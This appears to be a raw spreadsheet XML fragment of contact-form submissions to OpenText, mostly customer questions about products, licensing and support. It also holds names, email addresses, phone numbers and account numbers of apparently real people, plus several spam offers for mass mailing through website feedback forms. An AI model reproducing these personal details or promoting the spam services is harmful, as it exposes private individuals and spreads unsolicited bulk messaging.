How new technology and shifts in law department management are transforming the industry". When I enter all of the relevant information, I receive the following errors: Company    _x000D_
Value must not contain any URL’s_x000D_
DB Marketing Alias    _x000D_
Value must not contain any URL’s_x000D_
_x000D_
Could you please assist me with this? Thank you</t>
  </si>
  <si>
    <t>I am writing on behalf of another user who inquired about support for HostExplorer.  He was told that we had an old expired support contract, and we would need to get it renewed._x000D_
I would like to find out more about that, so that I can reach out to the correct resources to renew the contract.</t>
  </si>
  <si>
    <t>Hello, does your company offer military discounted prices for in classroom training?  Thank you for your help.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Is there a public documentation (for developers) available online or through pdf download for free?_x000D_
If so could you provide us with the page or download link? Our team would be glad to have access to it._x000D_
Thank you in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have written to you (Sales department) twice receiving no answer yet._x000D_
I decided to try with Customer Support and US/Florida now expecting better luck._x000D_
_x000D_
The company I work for is interested in licensing your product Composer Ciphersoft._x000D_
We want information about it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have written to you (Sales department) twice receiving no answer yet._x000D_
I decided to try with General Inquires and US/Florida to wait for better luck._x000D_
_x000D_
The company I work for is interested in licensing your product Composer Ciphersoft._x000D_
We want information about it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Would like to know why we seem to be getting connection issues?</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I just tried to register to OpenText and your website said I did not have access to do so. Any help would be appreciated._x000D_
_x000D_
Celeste</t>
  </si>
  <si>
    <t>Subject: Complete Computing APW10 update to windows 10 Pro v1809_x000D_
This weekend my CEO decided to update the APW10 PC which runs the TLW 6.5.2 software, now getting communication errors on send or receive.  _x000D_
_x000D_
I need to help my  admin employees through the steps the CEO forgot about.  _x000D_
The TLW software opens to show all folders.  I am attaching the TLW communication error screens, but need to know your recommendations for this problem.  You may have to refer me to tech support at OpenText, but I haven't ever needed that group before.  Thanks for steering me in the right direction._x000D_
Here is my license info._x000D_
Company=Complete Computing, Inc._x000D_
Contact=Harry Lubansky_x000D_
Machine name=APW10</t>
  </si>
  <si>
    <t>LA</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I’m a long time reader._x000D_
_x000D_
I’m writing to you because I’d love to contribute a guest post to your website._x000D_
_x000D_
I’ve been brainstorming some topics and I think your readers would get a ton of value from them._x000D_
I’ll make sure the piece is filled with information that can’t be found anywhere else. In exchange, all i expect is a backlink from within the main body of the article._x000D_
_x000D_
Do let me know if you like this proposal and if I can begin sending you some topic ideas._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ashlie Lopez</t>
  </si>
  <si>
    <t xml:space="preserve">can not get anyone to call back have left 4 messages over a 12 day period_x000D_
tried call calling other # transferred 4 times then it says leave message  _x000D_
WOW What customer service </t>
  </si>
  <si>
    <t>Can you give me the information for a reseller/partner that covers the Pittsburgh Pa. area. I would like to get some information on the Fax2Mail product. Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
we are distributing products to work with Right Fax 10, but for that we need to test the product with RightFax. We dont need a production instance. We talked with sales team and they offers us an instance for 11.500€ + installation + taxes, too much to test a plugin._x000D_
_x000D_
Do you provide any license for this purpose? We dont mind to get a watermark, change the text... _x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Document Management solution. </t>
  </si>
  <si>
    <t xml:space="preserve">Folks - I need a quick, high-level pricing for OpenText Notifications and OpenText Notifications Analytics for a potential project. </t>
  </si>
  <si>
    <t>Upgrade path for Metastorm BPM version 9 to latest possible release.</t>
  </si>
  <si>
    <t>I can't reset my password.  It won't take my updated password.</t>
  </si>
  <si>
    <t>I am looking for information and budgetary quote for an inbound fax solution. We are interested in something that will allow us to index faxes while we wait for permanent placement in the EHR. Interested in EHR integration as well. We have Meditech Client/Server.</t>
  </si>
  <si>
    <t>We currently have "Exceed" and "Secure Shell"  installed on "windows 7" machines.  I have installed it on a "Windows 10" machine and every so often the program will shut itself down and give an error, but it doesn't stay displayed long enough to write it down.  I am wondering if it is a "windows 10" compatibility issue.  If so, is there software available to support "windows 10", as we are in the process of upgrading all our machines?</t>
  </si>
  <si>
    <t xml:space="preserve">Follow up on  Service Request 1-3542053226 in regards to cancelling account 085020-00._x000D_
This request was made back in February and any attempts to get anyone to call me back and confirm the account has been cancelled have been unsuccessful.  We need confirmation in writing that the account is cancelled. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
_x000D_
"Greetings of the day"  _x000D_
_x000D_
My self Ragesh  krishnan CEO of Xime Infosolutions. XIME INFOSOLUTIONS is located at Kerala, India . We are committed to deliver cost effective and high quality BPO services and Accounting-services  to our client. Our business philosophy is based on building long-term relationships and providing cost effective, result oriented business value to our customers. _x000D_
_x000D_
We specialize in data entry, Proof reading,data processing and data conversion services.  We have good employees with 2-3 years experienced.  Our employees are expert in using all the MS Office Tools including MS Word, MS Excel, MS PowerPoint etc and using Google Docs and Google Spreadsheets. Our employees avg typing speed is 50 wpm with 99.9% accuracy_x000D_
_x000D_
On Accounting section We have good team for Accounting ,auditing and taxation. Majority of our team members related to Accounting and taxation services CA intermediate . We have provide Book keeping Service , Accounting service ,Tax consultant,Auditing ,Preparation of financial statement (Balance sheet and P/L), Preparation of MIS report ,GST and VAT return filing and auditing  _x000D_
_x000D_
We are committed to working on a 100% quality and timely manner. . We are sincere and a hard working with a habit of completing all the jobs within deadlines. We will assure 100% quality in minimum budget._x000D_
_x000D_
We have experienced in Receipt Transcription processing, different type of excel based entry works (invoice entry, double Keying, census work, telecom entry( English and Arabic numbers),check entry) , PDF to WORD conversion works (Financial Data PDF to Word conversion) and normal PDF to Word conversion, etc._x000D_
_x000D_
No of computers   : 52_x000D_
_x000D_
Hourly rate: $2.5_x000D_
_x000D_
We are also ready to work with Weekly bases,monthly based or production based_x000D_
_x000D_
Our office is located in Kerala. Compared to the salary received by the staff in your nation, the salary of our staff is very less. I know that the average salary of your staff that does data </t>
  </si>
  <si>
    <t xml:space="preserve">I have a customer looking for  -EXCEED POWERSUITE 15 - We need an email address to send a formal quote to. Also to see if we can purchase direct. </t>
  </si>
  <si>
    <t>We are interested in your invoice automation module for SAP . Would like to know about its capabilities, suitability for Indian market, Cloud or On premise . Would like to know details of commercial model also. We are analyzing different options for one of our client for invoice. Based on the analysis we are planning to recommend a suitable product which will suit my client (an Indian company) requirements and budget.</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
My name is Alyssa Malisani and I am a Business Marketing student at Conestoga College. For one of my classes, Human Resources Management, students are asking to contact a company of their choosing to interview via email. We would love to ask you questions about the Human Resources department at your company. _x000D_
Thank you for reviewing the request, and I hope to hear from you soon. _x000D_
Kind Regards, _x000D_
Alyssa Malisani</t>
  </si>
  <si>
    <t xml:space="preserve">I have one of my customers, who is looking for ECM to replace his old one. May I ask you for products catalog, pricing scheme, support policy, update &amp; upgrade policies._x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>We have been trying to reach Kris Mills (millsk@opentext.com) for a couple of weeks. If Kris is not available, can we have another rep assigned.</t>
  </si>
  <si>
    <t xml:space="preserve">I have one of my customers, who is looking for ECM to replace his old one. May I ask you for products catclogue, priceing scheme, support policy, update &amp; upgrade policies._x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>KE</t>
  </si>
  <si>
    <t>I have purchased a number of dongles for EnCase Forensic V8 recently. I seem to be unable to download the related software. Can you assist please, Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I am a software license compliance officer in SAP South Africa. Part of my responsibility is to audit customers on their compliant use of SAP software. What do I need to do to gain access to the audit guides for OpenText software products? I </t>
  </si>
  <si>
    <t>We have two physical (Server 2008 R2) RightFax 10.5 servers that use Brooktrout TRxStream Boards to connect to fax lines in our offices.  We are looking to upgrade these server to newer hardware/OS and a version of RightFax. Would we be able to setup a quick call as we are interested in discussing the upgrade options available to us at this time._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bradley</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
können Sie mir bitte mitteilen, ab welcher Version der Opentext Domea Client für die Installation unter Windows 10 freigegeben ist?_x000D_
Ich hätte auch gern selbst über unseren Opentext-Supportaccount die Release-Notes eingesehen, nur ist dies aufgrund eines "Web server error", welchen ich nach Anmeldung auf Ihrer Website erhalte, nicht möglich._x000D_
Hintergrund meiner Anfrage ist eine nicht funktionierende Installation des Features "Administration\ConfigAdmin" aus der Client-Version 4.5 mit dem Service Pack 8 unter Windows 10._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Aline Bergmeir_x000D_
_________________________x000D_
Referat ITZ VB4 _x000D_
Softwareverteilung_x000D_
_x000D_
Informationstechnikzentrum Bund (ITZBund)_x000D_
Außenstelle Nürnberg_x000D_
_x000D_
Frankenstraße 210, 90461 Nürnberg_x000D_
Telefon: 0911  943-23094_x000D_
E-Mail: aline.bergmeir@bamf.bund.de</t>
  </si>
  <si>
    <t>Just a generic question. As a Cognizant associate, am I eligible for My Support ? Please reply by email.</t>
  </si>
  <si>
    <t>I would like to know about the offerings related to automation on data consolidation front for a large bank and its subsidiaries.</t>
  </si>
  <si>
    <t>Hi, _x000D_
We use Encase but I don´t seem to get the e-mails any longer with the latest updates of the program. _x000D_
Could you please check why I can't access "My support"? Should I get the updates somewhere else?_x000D_
Best regards_x000D_
Jenny Isaksson</t>
  </si>
  <si>
    <t>I am now no longer getting ANX access</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am from Individual learning Pvt Ltd (Embibe) Bangalore. we want DMS solution that helps us to store all Accounts related file in Cloud and our management team will be able to easily access these files._x000D_
_x000D_
Could you please revert me or call me on 09770162827 for further discussion.</t>
  </si>
  <si>
    <t>Hello, I´ve recently changed my email-address from fmangelsdor1@it4ipm.de to fmangelsdorf@it4ipm.de which also has been confirmed by the Website. But now it seems that this account is not permitted to do anything on the knowledge-center. E.g. I can´t even see the ticket I´ve opened a couple of minutes ago. Thanks a lot for your Support. _x000D_
Best regards_x000D_
Fabian</t>
  </si>
  <si>
    <t>We are still using the Hummingbird BI-Query suite (Reports &amp; Admin) and are looking to replace it with something that is much more secure, but still offers the same flexibility of query design. I understand that your company took over Hummingbird some years ago and have a successor BI-Query product. We would like to see this new version and wonder if you have any kind of demo version that we can have access to?</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
I have change my email from sergio.saiz@holcim.com to sergio.saiz@lafargeholcim.com_x000D_
_x000D_
After that I have received an email with a link for confirmation and I click on that._x000D_
_x000D_
Now, I can't connect to OT mysupport because I see a message advertising about:_x000D_
"Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
_x000D_
Could you please help me with this?_x000D_
_x000D_
Thanks_x000D_
Sergio</t>
  </si>
  <si>
    <t>ENQUIRING WHETHER SUCH  A PRODUCT AS CAPABLE OF FAXING TO AN EMAIL_x000D_
ADDRESS SUCH TEXT FILE TYPE FAX AS WITH CONTENT INFORMING_x000D_
RECIPIENTS  OF AVAILABILTY AS OF A FREE TEST VERSION OF SIOUX SOFTWARE AS THOUGH STILL UNDER DEVELOPMENT AS WONDERING AS NON-KNOWLEDGABLE WHETHER EVEN SUCH AS CAPABLE  TOM OPDAHL PRESENT CPA PRESENT CPA FOREIGN BANK LIQUIDATOR FOR DAD'S MINISCULE FOREIGN BANK IN LIQUIDATION</t>
  </si>
  <si>
    <t>I need more information and possibly look at POC'ing the general archiving feature opentext has</t>
  </si>
  <si>
    <t>i have encase portable number is C1002044270._x000D_
please help to configure this portable encase to our pc asap._x000D_
thanks in advance</t>
  </si>
  <si>
    <t>cannot finish registration._x000D_
_x000D_
"Create user account error"</t>
  </si>
  <si>
    <t>The encase dongle cert file error. the same problem continues when I install new cert files.</t>
  </si>
  <si>
    <t>The global admin contact for BHP Billiton is listed as Jennice Thomas, who is no longer supporting BHP, Could you please transfer this admin role to my account._x000D_
Please let me know, what is required to process this.</t>
  </si>
  <si>
    <t>Technical Support</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get the latest trial version software of OpenText NFS client. However, while I fill-in all required information and click the "Send my trial request" button. No response in the website. Would you help to check? </t>
  </si>
  <si>
    <t xml:space="preserve">I filled out all of your forms only to get a server error.  I am looking for a free trial of Encase Forensic Imager for my Grad project for cybersecurity.  I just need a one month trial, project is due mid April.  </t>
  </si>
  <si>
    <t>LS</t>
  </si>
  <si>
    <t>Выполню массовые рассылки по 10 млн формам обратной связи! _x000D_
Имеющиеся категории баз: _x000D_
- Строительство: ~350 тыщ сайтов _x000D_
- Медицина: ~300 тыщ сайтов _x000D_
- Все сайты Москвы 1.5 млн сайтов _x000D_
- Отели / гостиницы: ~530 тыщ сайтов _x000D_
И огромная база сайтов в размере 150 млн в разных доменных именах _x000D_
ru/com/org/biz/kz/by и тд _x000D_
 _x000D_
Цена рассылки 999 рублей по указанным выше категориям _x000D_
Рассылка по всем базам 4999 руб. _x000D_
Рассылка по 150 млн сайтов - 29 990 руб _x000D_
Сроки рассылки от 1 до 5 дней. _x000D_
 _x000D_
Отличная доходимость писем до адресата через web сайт компании! _x000D_
 _x000D_
Если вам нужна рассылка пишите на почту: support@xrumer.xyz</t>
  </si>
  <si>
    <t>Good Evening, _x000D_
My name is Alyssa Malisani and I am a Conestoga College Business Marketing student. One of my classes -- Human Resources Management -- requires groups of students to select a business to interview. We would love to ask you a few questions about your Human Resources Management at the company via email by March 27th, 2019. _x000D_
Thank you for reviewing this email and I look forward to hearing from you soon. _x000D_
Kind Regards, _x000D_
Alyssa Malisani</t>
  </si>
  <si>
    <t>Hello,_x000D_
Would it be possible to send me information about pricing for the Documentum platform that is 21 CFR Part 11 compliant?_x000D_
Thank you,_x000D_
Kaitlyn Theberge</t>
  </si>
  <si>
    <t>BB</t>
  </si>
  <si>
    <t>AK</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to cancel my account on this site. I was redirected from Encase/Guidance Software and that seems to have been a missunderstanding, since I am not provided with the software that I was seracing for.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext,_x000D_
_x000D_
In my security research I came across EnCase, as a potential candidate for forensically sound procedures for data extraction from the Polar M400 smartwatch. I did not, however, find any evidence that the appropriate interfaces and APIs are implemented. Would you be so kind to point me to the right documentation or, ideally, demo software to verify this point? _x000D_
Thank you very much in advance,_x000D_
_x000D_
David_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich schreibe im Moment meine Bachelor Thesis zum Einsatz von künstlicher Intelligenz zur Analyse und Suche in Daten eines Helpdesk-Informationssystems. Für diese Thesis, wollte ich bei ihnen eine Testlizenz ihres Produktes "Open Text Magellan", bis einschließlich zum 13. Mai 2019, anfragen. Ihr Produkt würde für meine Bachelor Thesis sowie für eine anschließende Präsentation vor Geschäftsführer und Führungskräften verwendet werden._x000D_
Bei erfolgreichem Einsatz ihres Produkt, im Ramen dieser Thesis, wäre eine weitere Verwendung ihres Produkts in Betracht zu ziehen._x000D_
Mit freundlichen Grüßen _x000D_
Alexander Koch</t>
  </si>
  <si>
    <t>Hi There,_x000D_
We need quote for the following:_x000D_
EnCase Forensic V8 + 1 Year Subsbscription_x000D_
Thanks_x000D_
Ali</t>
  </si>
  <si>
    <t>Need a loan</t>
  </si>
  <si>
    <t>MH</t>
  </si>
  <si>
    <t>PR</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good day! That is an amazing offers for you. I can help you with sending  your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. Mailing is made in the same way as you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All us sites that have a feedback form. (10 million messages sent) - $349 instead of $649 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 31.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FeedbackForm2019@gmail.com _x000D_
 _x000D_
It's time to finish. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>We need to read some fields from unstructured Spanish documents. These fields will always be in the documents but their position within the document may vary and their text description may also vary a little from one doc to another. So OCR by templates administration is not a solution. Do you have any tool to help us solve our need? Thank you very much for your attention.</t>
  </si>
  <si>
    <t>QA</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
We are a shipping company situated in Qatar, we are searching for a business solution to automate our Accounts Payable and Accounts Receivable process. We would like to know whether you are offering customized solution to automate the process. We are using SAP system. Appreciate if your early reply. _x000D_
_x000D_
Our office hours 7.30 AM to 3.30 PM Qatar timing._x000D_
_x000D_
Regards,_x000D_
Ashraf</t>
  </si>
  <si>
    <t>We are interested in getting a demo for your document management system.</t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Correspondence Management System Market Size and Analysis - Forecasts to 2026._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
_x000D_
_x000D_
Best Regards!_x000D_
</t>
  </si>
  <si>
    <t>250/5000_x000D_
Hello good afternoon, I have a problem, to activate my Encase, I put my license number X100008336049, and it is not activating, I can not enter my support, the truth I urge the activation of the software, I hope you can help me, thank you very much.</t>
  </si>
  <si>
    <t>LI</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! Behold is  a good offers for you. I can send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for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 31. _x000D_
Feedback and warranty! _x000D_
Delivery report! _x000D_
 _x000D_
In the process of sending messages, we do not violate the rules of GDRP. _x000D_
This message is created automatically use our contacts for communication. _x000D_
 _x000D_
 _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
All the best _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>GR</t>
  </si>
  <si>
    <t>Mantis is already a partner of OT for many years, providing RightFax, Alchemy and worwflow solutions. We would like to add one more solution of yours (ECM). We already provide another ECM solution (so we have big pipeline) but we need to have in our portfolio an advanced solution like ECM of OT is.</t>
  </si>
  <si>
    <t>Rotary Actuators_x000D_
Type Vane Style _x000D_
Rotation Angle (Deg.)90 _x000D_
Torque (In.-Lbs.)442.54 in-lb/102 psi _x000D_
Bore 100mm _x000D_
Cushion Type None _x000D_
Port Size 1/4" Rc _x000D_
Maximum Pressure 145 PSI _x000D_
Operating Temp. Range 40 to 140 F _x000D_
Shaft Type Carbon Steel _x000D_
Shaft Length 65.0mm _x000D_
Shaft Dia. 25mm _x000D_
Keyway Length 5mm _x000D_
Key Height with Shaft28.0mm _x000D_
Housing Material Anodized Aluminum _x000D_
Powertrain Material Carbon Steel_x000D_
_x000D_
_x000D_
I would like to know the price each and I will get you the quantity needed. _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>CW</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Hi! There is nice offering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for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
Best wishes _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t xml:space="preserve">Our company is currently a Right Fax user. We are trying to upgrade and currently buy our services through a reseller. I would like to speak with someone from the company directly about pricing and possibly cutting out the middle man because the way the current effort is going, they are leading us to an approach to displace Right Fax in the environment. Please reach out to me via email. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm writing to you for the second time, not sure if you read my previous message weeks ago._x000D_
_x000D_
We are interested in your Composer for Oracle to ADF conversion._x000D_
We want to know about the licensing of the tool._x000D_
_x000D_
Regards,_x000D_
-Fernando Jimenez_x000D_
</t>
  </si>
  <si>
    <t>Verify phone 9165720532</t>
  </si>
  <si>
    <t>I wants to take training on this.</t>
  </si>
  <si>
    <t>We have a need for a Document Management System that is high on security, as well as configurable workflow management. Can be easily integrated with third party software via API.</t>
  </si>
  <si>
    <t>Olá. Sou funcionário de uma escola de idiomas localizada na Vila Olímpia e gostaria de saber de se vocês têm interesse em uma parceria para oferecer cursos de inglês na unidade ou in-company para seus colaboradores.</t>
  </si>
  <si>
    <t xml:space="preserve">how do I download software that are company GE Power has purchased? I've done the registration thing/confirm the email (at least 6 times) but it tells me I have no access. I sent a contact form last week and got no response. </t>
  </si>
  <si>
    <t>GE</t>
  </si>
  <si>
    <t xml:space="preserve">I received my 3 accounts - license key serial number.  I log into the OpenText website.  I need to add authorized users accounts or contacts.  Since our cybersecurity analysts staff will need to deploy it on the device at the SOC.  How do I do this?  Do I activate the key or have them do so?  Please help.  </t>
  </si>
  <si>
    <t>We will need to upgrade our current Rightfax installation.  In the past, we used Unity Telecomm for assistance in this but they have informed me that they no longer provide this service.  I would like to get information on possibly using OpenText professional service to assist us with the upgrade.</t>
  </si>
  <si>
    <t xml:space="preserve">Issue while loading Outlook 2010 when eDOCs DM addin is installed/enabled. Sending emails or opening an email is very slow.  Please help. </t>
  </si>
  <si>
    <t>We are using OpenText Workflow application for our project in Nassau Re. Need to find the right tool to test OpenText Web application. We are in the process of finalizing HP UFT(QTP) versus other open source tool such as Selenium. Need your assistance to find the right test automation tool for our project.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to understand how we might partner? We are an LXP (Learning Experience Platform) that is selling into the Call Center Space. We feel an integration with you products might be a strong selling point, but even if we dont do that - we can do-market. Thoughts? </t>
  </si>
  <si>
    <t>ET</t>
  </si>
  <si>
    <t>NT</t>
  </si>
  <si>
    <t xml:space="preserve">We need to purchase the catalog for Bloomigdales and Saks to buy our items._x000D_
</t>
  </si>
  <si>
    <t>I am interested in receiving a quote for the OpenText Host Explorer (3270 Terminal) software for about 26 computers. Thank you.</t>
  </si>
  <si>
    <t>My company has a Fax2Mail services contract in place that expires May 31, 2019. We need to get a renewal quote for this service ASAP. We originally purchased it through Prosource here in Cincinnai but we were told renewal would have to be done directly with OpenText. We had a conference call with mhawke@opentext.com back in November and they were supposed to get back to us after they researched our contract but they ever did. Please direct us to an account manager that wants to retain our business!</t>
  </si>
  <si>
    <t xml:space="preserve">Date : _x000D_
_x000D_
Dear Sir / Madam,_x000D_
_x000D_
We M/s M Constructions &amp; Interiors, situated in Indiranagar, Bangalore,_x000D_
Introduce ourselves as one of the emerging Civil and Interior Contractors._x000D_
For Residential, Commercials, Corporate, Hospitality Projects. Being a rising_x000D_
Firm we are enthusiastic to have our goal to ensure perfection in the works_x000D_
Nature for safety &amp; wellness of the awarded work to be completed within_x000D_
Time schedule &amp; budget of the client._x000D_
_x000D_
We are expertise in:_x000D_
_x000D_
1) Civil &amp; Interiors New projects and Renovations_x000D_
2) Painting_x000D_
3) Plumbing_x000D_
4) Electrical_x000D_
5) Carpentry_x000D_
6) Waterproofing_x000D_
7) Demolishing_x000D_
8) Tiling_x000D_
9) Fabrications_x000D_
10) False ceiling etc_x000D_
_x000D_
Considering our work depiction we request your good-self to offer us a chance to_x000D_
Prove our art of skills with efficient hard working group._x000D_
Assuring you the best of our services at all times,_x000D_
_x000D_
Thank You _x000D_
_x000D_
_x000D_
Santoshkumar_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have a RightFax server in house. I'd like to discuss with someone what our options are to get rid of it (cloud solutions, or other)._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, we write to make an inquiries about your fax broadcast service lease do tell us howdoes this service work and cost of sending._x000D_
_x000D_
Richard Galvin_x000D_
Argo Tea Company_x000D_
200 Poydras St, New Orleans, _x000D_
Ph: 504-446-6443_x000D_
Fx:  504-515-0286_x000D_
Email: argotea@argoteacompany.com_x000D_
</t>
  </si>
  <si>
    <t>Support</t>
  </si>
  <si>
    <t xml:space="preserve">Do you still offer paid support and upgrades to Documentum eRoom?_x000D_
</t>
  </si>
  <si>
    <t>Require firewall port requirements for RightFax outbound faxes to RF cloud. How does the client receive faxes, does it poll periodically with the cloud to determine if any is in the queue?_x000D_
Thanks,_x000D_
Dexter</t>
  </si>
  <si>
    <t>Please forward to whoever can reset my login on the careers page.  I tried to apply for the IT Operations Manager position 'using LinkedIn' and I'm not sure it completed.  Now when I try to go back and sign in to the careers page it won't accept any passwords I would have used and the password reset isn't working.</t>
  </si>
  <si>
    <t>I have some specific questions about OpenText Blazon product, and would like to talk to somebody about it as soon as practical please._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
We want to use Documentum REST API for Documentum CS 7.3._x000D_
Please help me to know how to get/download 'dctm-rest.war' for REST functionality._x000D_
_x000D_
How to use these servcise._x000D_
_x000D_
Regards,_x000D_
Amit Kumar</t>
  </si>
  <si>
    <t xml:space="preserve">In order to remain compliant with Nerc-Cip  regulations we are looking at all devices and software that may need to be periodically updated for security vulnerabilities. We are looking at Opentext Exceed to see if there are any security updates, can we get some direction on where to find documentation and or downloads in regards to this? </t>
  </si>
  <si>
    <t>I can't seem to find the EnCE re-certification sheet to fill out. I am due to re-certify by mid December of this year, and I was wondering if the requirements have changed now that Open Text has purchased EnCase. Would you please send me a link where I can find this information?</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
NOus réalisons l'envoi d'environ 3 Millions de relances de factures par courrier par an au travers du service DOCAPOST/MAILEVA. Pour la composition, nous utilisons l'outil Harmonie de SEFAS dont le contrat arrive à échéance au 1er déc. 2019. Nous souhaitons évaluer l'offre d'Opentext sur ce sujet de solution de composition car il nous a été confirmé u'Opentext est le leader mondial sur ce sujet._x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Frédéric DUPONT</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have a customer that I need to quote a RightFax solution to.  Was hoping to know who can tell me the right part numbers, etc in order to quote it out.  We are a Cisco Partner, so hoping to use the Cisco GPL in order to quote._x000D_
_x000D_
Thanks,_x000D_
Tim Huffmam</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have been tasked with investigating the setup of an OpenText IXOS solution to support the separation of our business SAP service from our parent company. The IXOS solution is used to host scanned invoices that are linked to SAP._x000D_
_x000D_
My requirement it to under stand the technical solution, build the technical design, and then implement._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Graham</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in getting a demo for document creation (templates, etc), workflows, approvals, renditions, etc.  We are looking for a software solution that can help us in the creation and management of Labels that are submitted to EPA and states in the approval process of pesticides. Labels are propriety content of the company and subject to audits, as such, appropriate content management is crucial. We do not have a system currently; a very manual, e-mail based process. Interested in knowing the benefits of working with Documentum and what offers differently from SharePoint.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I was wondering if you have a Product Specification or so with more info about the NFS Gateway solution._x000D_
_x000D_
At this moment I'm not interested in sales people coming over for meetings or demo's :)_x000D_
This is just an early stage where I'm looking at a possible solution, so I can discuss internally. So I just would like more (technical) info about NFS Gateway and maybe also NFS Solo._x000D_
_x000D_
In short: we have NAS and Gluster Storage, offering NFS to Linux clients and CIFS (on NAS) to Windows clients. Instead of implementing CIFS/SMB on Gluster Storage too, I'm looking at a good solution to offer NFS access for Windows clients to the Gluster Storage NFS shares (and NAS) in case we have a share that needs access by both Linux and Windows clients._x000D_
_x000D_
Regards,_x000D_
Stefan</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
we are not able to register on your site to access the "My support" features._x000D_
Can you help us?_x000D_
_x000D_
Thanks_x000D_
Anzelini Paolo</t>
  </si>
  <si>
    <t xml:space="preserve">Buongiorno,_x000D_
vorremmo inviare del materiale informativo relativo alla nostra attività in vista del BAUMA 2019._x000D_
Potreste fornirci un indirizzo mail a cui inviarlo?_x000D_
Grazie in anticipo,_x000D_
Ilaria_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We have a general contract (as Tradificom) for Compagnie Financière Tradition (originally with Easylink)._x000D_
_x000D_
Our entity in North America (TRADITION (NORTH AMERICA) INC, .Easylink user ID : TUT05800) has changed all their email addresses, and in particular the email of the sender to your service._x000D_
OLD: backoffice.newyork@TRADITION-NA.COM_x000D_
NEW: backoffice.newyork@TRADITION.COM_x000D_
_x000D_
They asked us for help but neither us nor them have a Login/password._x000D_
_x000D_
My request:_x000D_
